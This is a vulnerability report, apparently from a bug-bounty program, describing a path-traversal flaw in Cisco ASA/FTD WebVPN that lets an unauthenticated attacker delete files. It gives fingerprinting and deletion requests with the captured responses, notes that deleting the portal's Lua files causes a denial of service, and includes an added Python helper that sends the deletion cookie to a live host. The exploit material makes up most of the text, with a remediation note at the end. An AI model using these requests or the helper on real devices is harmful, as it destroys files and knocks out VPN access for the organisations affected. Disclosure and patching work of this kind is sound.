Summary:
A vulnerability in the interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files.
Description:
Vulnerable host:
██████████
An exploit could allow the attacker to view or delete arbitrary files on the system.
1. Identify a vulnerable host by sending a request to /+CSCOE+/session_password.html:
curl -skiL "███/+CSCOE+/session_password.html"
GET /+CSCOE+/session_password.html HTTP/1.1
Host: ███████
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,ar;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: webvpnlogin=1; webvpnLang=en
Upgrade-Insecure-Requests: 1
If the target is vulnerable, the response carries an (empty) `webvpn:` header. The request above returned the following response:
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 0
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Wed, 04 Nov 2020 21:40:44 GMT
X-Frame-Options: SAMEORIGIN
webvpn:
2. Pick a target file that can be deleted, then delete it by placing the traversal path in the `token` cookie of the request.
I first wanted to delete the custom logo (██████/+CSCOU+/csco_logo.gif). That did not work: the custom logo file sometimes has permission settings that prevent deletion. Other files can still be deleted, so the target used here is "█████/+CSCOE+/blank.html", an empty HTML file that is served normally before the exploit.
Request (the same headers as in step 1, sent to /+CSCOE+/blank.html to confirm the file exists):
Host: ██████
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,ar;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: webvpnlogin=1; webvpnLang=en
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Wed, 04 Nov 2020 21:54:48 GMT
X-Frame-Options: SAMEORIGIN
Content-Length: 13
<HTML></HTML>
**3. Exploit the vulnerability and delete the blank file by sending the traversal path in the `token` cookie:**
Request:
GET /+CSCOE+/session_password.html HTTP/1.1
Host: █████████
Cookie: token=…/+CSCOE+/blank.html
User-Agent: curl/7.47.0
Accept: */*
Response:
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 0
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Wed, 04 Nov 2020 21:55:02 GMT
X-Frame-Options: SAMEORIGIN
webvpn:
The file was deleted successfully; a follow-up request for it now returns 404:
`curl -Ik ████/+CSCOE+/blank.html`
HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Connection: Close
Date: Wed, 04 Nov 2020 21:55:08 GMT
X-Frame-Options: SAMEORIGIN
File not found
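The three steps above, as an added example that is not part of the original report: a small Python helper that fingerprints a host by the bare `webvpn:` response header (step 1), checks a target file before and after the deletion request (steps 2 and 3), and sends the `token` cookie the way the report does. The traversal prefix is elided ("…") in the report, so it is left as a caller-supplied argument rather than filled in. The parsing functions run offline against constructed responses copied from the ones shown above; `send_request` is the only network path and uses the standard library with certificate checks disabled, equivalent to `curl -k`.

```python
"""Added example (not the report's own tooling): fingerprint and
before/after checks for the ASA/FTD WebVPN path traversal described above."""
import http.client
import ssl
from typing import Dict, Optional, Tuple

FINGERPRINT_PATH = "/+CSCOE+/session_password.html"
TARGET_PATH = "/+CSCOE+/blank.html"


def parse_response(raw: str) -> Tuple[int, Dict[str, str], str]:
    """Split a raw HTTP/1.1 response into (status, headers, body).
    Header names are lower-cased; a value-less header such as `webvpn:`
    is kept with an empty string so its presence can be tested."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    status = int(lines[0].split()[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip():
            headers[name.strip().lower()] = value.strip()
    return status, headers, body


def is_vulnerable_fingerprint(raw: str) -> bool:
    """Step 1: a 200 to session_password.html that carries a `webvpn` header."""
    status, headers, _ = parse_response(raw)
    return status == 200 and "webvpn" in headers


def deletion_confirmed(before_raw: str, after_raw: str) -> bool:
    """Step 3 check: the target was served (200) before and is gone (404) after."""
    return parse_response(before_raw)[0] == 200 and parse_response(after_raw)[0] == 404


def send_request(host: str, path: str, cookie: Optional[str] = None,
                 timeout: float = 10.0) -> str:
    """GET `path` over TLS without certificate verification (like curl -k) and
    return the response re-serialised as raw text for parse_response()."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    conn = http.client.HTTPSConnection(host, 443, context=ctx, timeout=timeout)
    headers = {"Host": host, "User-Agent": "curl/7.47.0", "Accept": "*/*"}
    if cookie:
        headers["Cookie"] = cookie
    conn.request("GET", path, headers=headers)
    resp = conn.getresponse()
    raw = (f"HTTP/1.1 {resp.status} {resp.reason}\n"
           + "\n".join(f"{k}: {v}" for k, v in resp.getheaders())
           + "\n\n" + resp.read().decode(errors="replace"))
    conn.close()
    return raw


def delete_via_token(host: str, traversal: str, target: str = TARGET_PATH) -> str:
    """Steps 2-3 on the wire: the report's request with `token=<traversal><target>`.
    `traversal` is the prefix the report elides; supply it explicitly."""
    return send_request(host, FINGERPRINT_PATH, cookie=f"token={traversal}{target}")


# Constructed samples mirroring the responses shown in the report (not captured here).
SAMPLE_FINGERPRINT = ("HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\nContent-Length: 0\r\n"
                      "X-Frame-Options: SAMEORIGIN\r\nwebvpn:\r\n\r\n")
SAMPLE_NOT_WEBVPN = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 0\r\n\r\n")
SAMPLE_BEFORE = ("HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n"
                 "Content-Length: 13\r\n\r\n<HTML></HTML>")
SAMPLE_AFTER = ("HTTP/1.1 404 Not Found\r\nCache-Control: no-cache\r\nConnection: Close\r\n"
                "\r\nFile not found")

if __name__ == "__main__":
    print("fingerprint:", is_vulnerable_fingerprint(SAMPLE_FINGERPRINT))
    print("deleted:", deletion_confirmed(SAMPLE_BEFORE, SAMPLE_AFTER))
```

Usage against a live host would be `is_vulnerable_fingerprint(send_request(host, FINGERPRINT_PATH))`, then `send_request(host, TARGET_PATH)` before and after `delete_via_token(host, traversal)`; run `deletion_confirmed` on the two captures. The fingerprint check keys on the `webvpn` header alone, which identifies the WebVPN service rather than proving the patch level, so treat a positive result as a candidate to test in a lab, not as confirmation.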
Warning: the same primitive can cause a denial of service (DoS) on the VPN. Deleting the Lua source files of the WebVPN portal from the file system breaks the WebVPN interface until the device is rebooted.
## Suggested Mitigation/Remediation Actions
Upgrade the ASA or FTD software to a fixed release per the referenced Cisco advisory, available at the following link:
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43
## Impact
*High - This vulnerability allows the attacker to delete files within the web services file system.*